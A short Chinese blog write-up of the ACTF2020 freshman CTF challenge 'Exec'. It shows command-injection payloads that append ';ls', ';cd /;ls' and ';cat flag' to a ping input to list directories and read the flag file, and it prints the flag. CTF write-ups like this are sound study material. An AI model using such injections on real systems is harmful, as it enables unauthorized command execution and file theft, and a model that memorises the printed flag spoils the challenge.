[ACTF2020 新生赛]Exec 1
下午写了这个,看了别人的解题过程,还是不太能理解。
题目有可能是sql注入,也可能是命令执行漏洞。
输入ping 127.0.0.1;ls
直接显示index.php
Linux系统显示网页的路径是/var/www/html,说明index.php在路径中
返回根目录看看是否有flag,127.0.0.1;cd /;ls
能看见flag在目录中
最后127.0.0.1;cd /;cat flag
得到flag{131b1282-4d92-49ca-af2b-b3393f9ccc29}
标签:ACTF2020,127.0,Exec,0.1,新生,cd,flag From: https://www.cnblogs.com/getcha/p/16839190.html